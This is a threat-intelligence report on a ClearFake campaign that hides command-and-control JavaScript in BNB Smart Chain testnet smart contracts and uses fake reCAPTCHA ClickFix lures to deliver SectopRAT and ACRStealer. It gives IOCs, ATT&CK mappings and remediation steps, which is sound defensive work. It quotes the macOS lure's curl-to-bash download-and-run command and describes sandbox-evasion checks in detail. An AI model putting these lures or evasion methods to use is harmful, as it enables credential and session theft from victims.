Threat reportMalwareTL-2026-0592

ClearFake EtherHiding on BNB Smart Chain Testnet — Smart Contract C2 Delivering SectopRAT + ACRStealer via ClickFix Fake-CAPTCHA

highACTIVE

ClearFake EtherHiding on BNB Smart Chain Testnet (TL-2026-0592), also tracked as ClearFake on BSC Testnet, is a high-severity malware campaign, first published 2026-05-26 and last reviewed 2026-08-26. It is attributed to UNC5142 with medium confidence, affects Microsoft Windows (WebClient / WebDAV), maps to 35 MITRE ATT&CK techniques (T1005, T1008, T1016), and is covered by 9 detection rules and 39 indicators of compromise.

Severity
HIGHAssessed severity
CVEs
0None referenced
Techniques
35MITRE ATT&CK
Actors
1UNC5142
Detection rules
9SPL · KQL · Sigma
IOCs
39Indicators of compromise

Key facts for TL-2026-0592

Threat ID
TL-2026-0592
Also known as
ClearFake on BSC Testnet, Smart Contracts for C&C, EtherHiding ClearFake Cluster, ClearFake SectopRAT/ACRStealer Campaign
Severity
HIGH
Status
ACTIVE
Category
MALWARE
First published
Last reviewed
Attribution
UNC5142
Attribution confidence
MEDIUM
Motivation
FINANCIAL
Target sectors
consumer, enterprise, general, hospitality_recreation, managed_service_provider_customers
Target regions
Switzerland, Europe, Global
Detection rules
9
Indicators of compromise
39
Updates
2026-08-26 · revalidated 1× · latest source

Malware and tooling in ClearFake EtherHiding on BNB Smart Chain Testnet

Malware and tooling: ACR Stealer, ClearFake, SectopRAT, Python 3.15 embeddable runtime (abused), VLC media player (legitimate binaries abused for sideloading)

How ClearFake EtherHiding on BNB Smart Chain Testnet works

Trend Micro analyzed a real intrusion in which threat actors abused the EtherHiding technique on the BNB Smart Chain testnet to host immutable, takedown-resistant command-and-control logic and payloads. Four Solidity smart contracts sharing one deployer wallet act as a Stage 1 dispatcher, OS-specific (Windows and macOS) ClickFix overlay payloads, and an on-chain execution tracker, routing ClearFake-injected JavaScript from a compromised Swiss WordPress site through fake Google reCAPTCHA / ClickFix social engineering to deliver SectopRAT (.NET browser-session hijacker) and ACRStealer (C++ infostealer). Oldest contract deployed 26 May 2025 — confirming a ~1-year actively maintained campaign — with addtoList() victim-IP entries proving live exploitation at the time of publication.

Smart Contracts for C&C — How ClearFake Hid in Plain Sight on BSC Testnet (Trend Micro / TrendAI Research, Ryan Soliven, 26 May 2026) documents an MDR-derived intrusion that elevates the EtherHiding technique from proof-of-concept to operational, blockchain-native command-and-control. Rather than hosting payloads or routing logic on traditional web infrastructure, the operators write base64-encoded JavaScript payloads directly into the on-chain storage of Solidity smart contracts deployed to the BNB Smart Chain (BSC) testnet. Because BSC is an Ethereum-compatible network whose contract storage is replicated across every node and is, by design, immutable, the payloads cannot be sinkholed, suspended, or seized by registrars, hosting providers, or law enforcement. Operation on the testnet (not mainnet) is deliberate: test BNB has no monetary value and is freely available from public faucets, giving the threat actor a zero-cost, takedown-resistant routing layer.

The campaign uses four smart contracts, all deployed by a single wallet (0xd71f4cdC84420d2bd07F50787B4F998b4c2d5290) and all implementing the same minimal key-value-store Solidity pattern. The contracts expose a publicly readable get() function (selector 0x6d4ce63c) which a victim browser reads via standard JSON-RPC eth_call to the public BSC testnet RPC endpoint bsc-testnet-rpc.publicnode.com, an owner-restricted set() function (selector 0x4ed3885e) used by the operator to update payloads with a single transaction, and an owner() function returning the deployer wallet. Smart Contract A (0xA1decFB75C8C0CA28C10517ce56B710baf727d2e, deployed 26 May 2025) is the Stage 1 entry-point dispatcher whose address is embedded in the obfuscated JavaScript injected into compromised websites. Smart Contract B (0x46790e2Ac7F3CA5a7D1bfCe312d11E91d23383Ff, deployed 24 Sep 2025) stores the Windows-specific ~43 KB Stage 3 ClickFix overlay payload. Smart Contract C (0x68DcE15C1002a2689E19D33A3aE509DD1fEb11A5, deployed 30 Sep 2025) stores the macOS-specific Stage 3 payload. Smart Contract D (0xf4a32588b50a59a82fbA148d436081A48d80832A, deployed 18 Jun 2025) is the on-chain execution tracker: the read-side isGoalReached(uuid) suppresses the overlay for already-compromised victims to limit researcher exposure, while the write-side addtoList(string) records the victim's public IP — ABI-decoded transactions captured by Trend Micro on BscScan confirm live victim execution events.

Initial access in the analyzed case was a watering-hole compromise of a legitimate Swiss WordPress recreational activity website. At line 146 of the page <head>, a single rogue tag of the form <script src="data:text/javascript;base64,…"> was injected alongside 22 legitimate WordPress and plugin scripts. The inline data: URI carries the ClearFake Stage 1 loader as base64 inline content, defeating URL-based blocking because no external domain is referenced in the static page source. Decoded, Stage 1 is an obfuscated JavaScript file using a string-array rotation pattern: a function _0x4e2e() exposes all plaintext strings as an indexed array, and a self-invoking IIFE shuffles the array at runtime until an integer checksum validates. After deobfuscation, the script's async load_() function manually constructs an eth_call JSON-RPC request to the BSC testnet RPC, decodes the EVM ABI-encoded string response (32-byte offset, 32-byte length, raw string bytes) in custom JavaScript to avoid any Web3 library dependency, base64-decodes the returned string from Smart Contract A, and eval-executes Stage 2 in the browser. A .catch(() => {}) silent error handler ensures the failure mode is fully invisible to the victim.

Stage 2 is the anti-analysis and OS routing layer. The isHeadless() function tests seven conditions: navigator.webdriver, /HeadlessChrome/ in user agent, PhantomJS / Puppeteer / Playwright user-agent strings, window.outerWidth === 0 && window.outerHeight === 0, and the absence of all of window.chrome, window.safari, and Firefox in the user agent. The isLocalhost() function does not see the endpoint's internal RFC1918 address — instead it issues an XHR to ip-info.ff.avast.com/v2/info to fetch the public egress IP, then blocks 192.168.0.0/16, 10.0.0.0/8, 172.16.0.0/12, and localhost variants, filtering out cloud sandboxes and researcher VPNs. Victims that pass both checks are fingerprinted by navigator.userAgent and navigator.userAgentData.platform and routed to Smart Contract B (Windows) or Smart Contract C (macOS); if either check fails, the script writes 'stop watching us :)' to console and exits silently.

Stage 3 (Windows) renders a high-fidelity fake Google reCAPTCHA overlay containing the genuine Google logo SVG, the 'I'm not a robot' checkbox, and Privacy/Terms links. Clicking the checkbox both displays the ClickFix social-engineering instructions and synchronously calls navigator.clipboard.writeText() to plant a Run-dialog command in the victim clipboard. Before rendering, the script also calls getUserID() — a synchronous XMLHttpRequest to ip-info.ff.avast.com that captures the victim's real public IP and persists it as a UUID in the cookie cjs_id with a 2-day TTL — so that the threat actor can correlate browser-side conversions with the on-chain addtoList() entries on Smart Contract D. Execution telemetry confirmed the victim opened the Run dialog and executed the clipboard command, causing the Windows WebClient service to load put34b.camp — a remote DLL with a non-standard .camp extension served over WebDAV — directly into memory via rundll32.exe with a UNC-path argument. No file-creation event for put34b.camp was recorded; the DLL is purely in-memory. rundll32.exe then performed two PROCESS_CREATE_REMOTETHREAD operations injecting threads into chrome.exe and msedge.exe; the injected code (later associated with _remote_debugging.pyd) performs browser credential, cookie, password, and session theft.

Stage 4 (Windows) drops a complete Python 3.15 embeddable runtime (38 files including pythonw.exe and helper.py) into C:\Users\[User]\AppData\Local\FileZilla\Data\DC80D99D\, a path masquerading as the FileZilla FTP client. A process-creation event records pythonw.exe helper.py launching, and Trend Micro identifies this Python-based loader as matching the ACRStealer profile previously documented by Vega Security on a related ClearFake contract cluster (February 2026). Concurrently, a DLL sideloading triad is staged in C:\Users\[User]\AppData\Local\Mozilla\Firefox\361e6e66.default\ consisting of a legitimate vlc.exe and libvlc.dll alongside a malicious libvlccore.dll — a proxy DLL that forwards real VLC API calls while decrypting and executing a 4.29 MB ACRStealer payload embedded in its .reloc section. SectopRAT is the .NET RAT that performs the actual browser-session hijack: it spawns an invisible secondary desktop, drives Chrome and Edge in that hidden desktop, and exfiltrates browser passwords, credit cards, cookies, cryptocurrency wallet extension data, Discord and Telegram sessions, Steam, VPN, and FTP credentials, with download2324.mediafire.com observed as a fallback C2 if primary infrastructure is unavailable.

The macOS variant routed via Smart Contract C reuses the same isHeadless()/isLocalhost()/Avast-IP/cjs_id/Smart Contract D conversion-tracking scaffolding but swaps the ClickFix instructions for 'Open Terminal (Applications > Utilities > Terminal); press Command+V; press Enter'. The clipboard payload is /bin/bash -c "$(curl -A 'Mac OS X 10_15_7' -fsSL '[URL]')", spoofing macOS Catalina 10.15.7 in the user agent to fetch the macOS-specific variant; the download URL is built dynamically inside obfuscated Stage 3 JavaScript and was not recovered as plaintext. The macOS path adds a secondary victim-tracking channel — a Yandex Metrika analytics tracker (counter ID 99162160, mc.yandex.ru/metrika/tag.js) injected via a nested eval(atob(<base64>)) — giving the operator click-map, link-tracking, and bounce-rate telemetry through a fully legitimate analytics service alongside the on-chain conversion tracker. Forensic confirmation that both OS payloads share authorship comes from identical overlay layout, reCAPTCHA assets, and the shared deployer wallet and Smart Contract D conversion tracker.

Trend Micro does not attribute this specific campaign. The article notes that Google's October 2025 research reported DPRK-aligned cluster UNC5342 has adopted EtherHiding generally, demonstrating the technique's spread to nation-state capability, but the ClearFake/SectopRAT/ACRStealer cluster analyzed here is unattributed. All four smart contracts were live on the BSC testnet at publication and remain immutable; takedown is impossible by design. Operational defensive guidance from Trend Micro emphasizes blocking outbound JSON-RPC traffic to bsc-testnet-rpc.publicnode.com (and other BSC testnet RPC endpoints) from non-developer fleets, disabling the Windows WebClient service where WebDAV is not required, behavioral detection on rundll32.exe with UNC-path arguments, restricting clipboard write access in enterprise browser policy, alerting on eth_call patterns in web-proxy logs as an early-warning EtherHiding indicator, and end-user awareness training against fake-CAPTCHA / ClickFix lures, since the entire post-infection chain hinges on a single deliberate Run-dialog or Terminal paste-and-execute action by the victim.

MITRE ATT&CK techniques used in TL-2026-0592

Collection

T1005 Data from Local System; T1115 Clipboard Data

Command and Control

T1008 Fallback Channels; T1071.001 Web Protocols; T1102.002 Bidirectional Communication; T1105 Ingress Tool Transfer; T1573 Encrypted Channel

Discovery

T1016 System Network Configuration Discovery; T1016.001 System Network Configuration Discovery: Internet Connection Discovery; T1082 System Information Discovery; T1518.001 Software Discovery: Security Software Discovery

Defense Evasion

T1027 Obfuscated Files or Information; T1027.013 Obfuscated Files or Information: Encrypted/Encoded File; T1036.005 Match Legitimate Resource Name or Location; T1055.003 Thread Execution Hijacking; T1140 Deobfuscate/Decode Files or Information; T1497.001 Virtualization/Sandbox Evasion: System Checks; T1497.002 Virtualization/Sandbox Evasion: User Activity Based Checks; T1574.001 DLL; T1574.002 Hijack Execution Flow: DLL Side-Loading; T1620 Reflective Code Loading

Exfiltration

T1041 Exfiltration Over C2 Channel; T1567 Exfiltration Over Web Service

Execution

T1059.004 Command and Scripting Interpreter: Unix Shell; T1059.006 Command and Scripting Interpreter: Python; T1059.007 Command and Scripting Interpreter: JavaScript; T1204.004 User Execution: Malicious Copy and Paste

Initial Access

T1189 Drive-by Compromise

stealth

T1218.011 System Binary Proxy Execution: Rundll32

Credential Access

T1539 Steal Web Session Cookie; T1555.003 Credentials from Password Stores: Credentials from Web Browsers

Resource Development

T1583.006 Acquire Infrastructure: Web Services; T1584.004 Compromise Infrastructure: Server; T1608.001 Stage Capabilities: Upload Malware; T1608.004 Stage Capabilities: Drive-by Target

Affected products and versions in ClearFake EtherHiding on BNB Smart Chain Testnet

  • Microsoft — Windows (WebClient / WebDAV)
    Vulnerable versions: 10; 11; Server 2016; Server 2019; Server 2022
  • Google — Chrome (browser session hijack target)
    Vulnerable versions: all current
  • Microsoft — Edge (browser session hijack target)
    Vulnerable versions: all current
  • Mozilla — Firefox (DLL sideloading host profile)
    Vulnerable versions: all current
  • Apple — macOS (Terminal-based ClickFix variant)
    Vulnerable versions: 10.15+; 11; 12; 13; 14; 15
  • VideoLAN — VLC media player (legitimate binary abused for DLL sideloading)
    Vulnerable versions: sideloading host — not a VLC vulnerability
  • Python Software Foundation — Python 3.15 embeddable runtime (abused as silent interpreter dropper)
    Vulnerable versions: 3.15 embeddable
  • Automattic — WordPress (compromised watering-hole CMS)
    Vulnerable versions: compromised installs of unspecified version

Remediation for ClearFake EtherHiding on BNB Smart Chain Testnet

Patches

  • No software CVE applies — this is a campaign abusing legitimate browser, BSC blockchain, Avast IP-geolocation, and Yandex Metrika infrastructure. There is no patch; defenses are configuration- and detection-based.
  • Affected legitimate Swiss WordPress watering-hole site operators should treat as a compromised CMS: rotate all admin credentials, audit users/plugins, restore from clean backup, deploy WAF, scan for additional injections in theme/plugin/post content

Immediate actions

  • Block outbound JSON-RPC traffic to BSC testnet RPC endpoints starting with bsc-testnet-rpc.publicnode.com at proxy/firewall for non-developer fleets
  • Disable the Windows WebClient service on workstations that do not require WebDAV (this kills the put34b.camp remote-DLL load path entirely)
  • Restrict clipboard write access (navigator.clipboard.writeText) via enterprise browser management policy to break the ClickFix paste-and-execute step
  • Hunt for the four BSC testnet contract addresses (0xA1de…7d2e, 0x4679…83Ff, 0x68Dc…11A5, 0xf4a3…832A) and the deployer wallet 0xd71f…5290 in DNS, proxy and EDR script telemetry
  • Hunt for endpoints with cjs_id cookies, AppData\Local\FileZilla\Data\DC80D99D\ directory, or 361e6e66.default\libvlccore.dll under Mozilla\Firefox
  • Block egress to download2324.mediafire.com and alert on outbound DNS for unusual mc.yandex.ru tag.js loads from non-marketing endpoints

Workarounds

  • If WebClient cannot be disabled, deploy detection-only rules on rundll32.exe with UNC arguments and quarantine on match
  • If enterprise browser clipboard policy cannot be enforced, deploy EDR clipboard-write monitoring and alert on writes containing 'powershell', 'curl', '/bin/bash', or 'rundll32' substrings
  • Block all outbound traffic to public BSC testnet RPC providers from corporate endpoints by default, allowlist for known Web3 developer endpoints only

Longer-term hardening

  • Add web-proxy/SSL-inspection signatures alerting on eth_call JSON-RPC payloads and BSC/Ethereum RPC endpoints as early-warning EtherHiding indicators across the fleet
  • Deploy behavioral EDR rules targeting rundll32.exe with UNC-path or http(s) arguments — the Windows WebDAV remote-DLL load is a high-signal anomaly
  • Restrict end-user access to the Windows Run dialog via Group Policy where business-justified (User Configuration > Administrative Templates > Start Menu and Taskbar > Remove Run menu)
  • Deploy application allowlisting (WDAC / AppLocker) covering rundll32.exe, pythonw.exe, and vlc.exe to break DLL-sideloading and Python-runtime drop chains
  • Add behavioral detection for PROCESS_CREATE_REMOTETHREAD where rundll32.exe injects into chrome.exe / msedge.exe / firefox.exe
  • Deploy DNS sinkholing for known stealer fallback infrastructure (mediafire subdomain telemetry, BSC RPC providers) and monitor for browser processes resolving them
  • End-user awareness training on fake reCAPTCHA / ClickFix social engineering with emphasis on the 'verify by pressing Win+R / Cmd+V' anti-pattern
  • Inventory and restrict WebDAV client functionality across the estate; many environments do not need it

Weaknesses (CWE) in ClearFake EtherHiding on BNB Smart Chain Testnet

CWE-94, CWE-829, CWE-1357

Timeline of ClearFake EtherHiding on BNB Smart Chain Testnet

  • ClearFake fake-browser-update JavaScript injection campaign first observed in the wild, predating the EtherHiding pivot by roughly three months.
  • ClearFake first documented publicly, injecting base64-encoded malicious scripts into compromised website HTML — prior to the on-chain C2 pivot.
  • ClearFake operators begin retrieving the next-stage JavaScript payload from a BNB Smart Chain smart contract instead of an attacker-owned domain — the technical origin of the EtherHiding technique, roughly two weeks before its public Guardz disclosure.
  • EtherHiding technique first publicly documented by Guardz — JavaScript loader retrieving payloads from BSC smart-contract storage via eth_call
  • Kroll observes ClearFake shift to a ClickFix-style clipboard-injection lure, tricking victims into pasting and running attacker-supplied commands themselves.
  • DPRK-linked UNC5342 (DeceptiveDevelopment/CL-STA-0240/Famous Chollima) independently begins using EtherHiding for its own Contagious Interview campaign, per Google GTIG — predates the October 2025 public disclosure by roughly eight months.
  • Smart Contract A (Stage 1 dispatcher) 0xA1decFB75C8C0CA28C10517ce56B710baf727d2e deployed on BSC testnet by 0xd71f…5290 — campaign operational start
  • Smart Contract D (on-chain execution tracker, isGoalReached/addtoList) 0xf4a32588b50a59a82fbA148d436081A48d80832A deployed
  • Smart Contract B (Windows ClickFix overlay payload) 0x46790e2Ac7F3CA5a7D1bfCe312d11E91d23383Ff deployed
  • Smart Contract C (macOS payload) 0x68DcE15C1002a2689E19D33A3aE509DD1fEb11A5 deployed — cross-platform capability complete
  • Google TAG/Mandiant attribute DPRK cluster UNC5342 to broader EtherHiding adoption, escalating the technique to nation-state capability
  • ACRStealer updates its C2 encryption scheme, replacing a hardcoded AES key with ECDH key exchange and ChaCha20-Poly1305 authenticated encryption.
  • Vega Security publishes analysis of a related ClearFake contract cluster identifying the Python-based loader as ACRStealer
  • LevelBlue SpiderLabs publishes analysis of ErrTraffic v3, a separate ClickFix framework also abusing EtherHiding (on Polygon), independently cross-corroborating two of ClearFake's BSC contract addresses (the Windows/macOS payload contracts and the execution-tracker contract).
  • Trend Micro TrendAI Vision One MDR case opened — Swiss WordPress watering-hole compromise of an enterprise endpoint triggers full reconstruction
  • Red Canary May 2026 Intelligence Insights ranks ClearFake as the #1 most prevalent threat in monitored customer environments
  • Trend Micro publishes 'Smart Contracts for C&C: How ClearFake Hid in Plain Sight on BSC Testnet' (Ryan Soliven) — full IOC set, contract addresses, attack chain disclosed; all four contracts remain live and immutable on BSC testnet
  • As of 2026-05-29, this ClearFake EtherHiding campaign is fully active: published 2026-05-26 with live on-chain victim entries, its four BSC-testnet C2 contracts are immutable and untakedownable by design. Red Canary ranked ClearFake the #1 most prevalent threat in May 2026, and EtherHiding/SectopRAT/ACRStealer keep spreading (UNC5342, UNC5142, ErrTraffic v3).

Update history for TL-2026-0592

Sources cited for ClearFake EtherHiding on BNB Smart Chain Testnet

Detection coverage for TL-2026-0592

As of 2026-08-26, Threadlinqs Intelligence publishes 9 detection rule(s) for TL-2026-0592 across Splunk SPL, Microsoft KQL and Sigma, covering 39 indicator(s) of compromise. The whole corpus is readable without an account; a free account unlocks full detection query text in Splunk SPL, Microsoft KQL and Sigma; paid tiers add raw indicator values, correlation and the MCP server. Threadlinqs MCP server · View plans.

9 detection rules (Splunk SPL, Microsoft KQL, Sigma) · Blue and above. Compare plans
39 indicators of compromise · Red and above. Compare plans

Threadlinqs Intelligence — Real-Time Threat Detection Platform

[ 0 threats ] [ 0 det ] [ CRIT: 0 ] [ HIGH: 0 ]
// threat_feed
$ sort --newest
Showing all threats

Live intelligence console

Threat level
Fig. 01 · Threat weatherIndexing the archive…
1 square = 1 threat · click to open

Latest Threats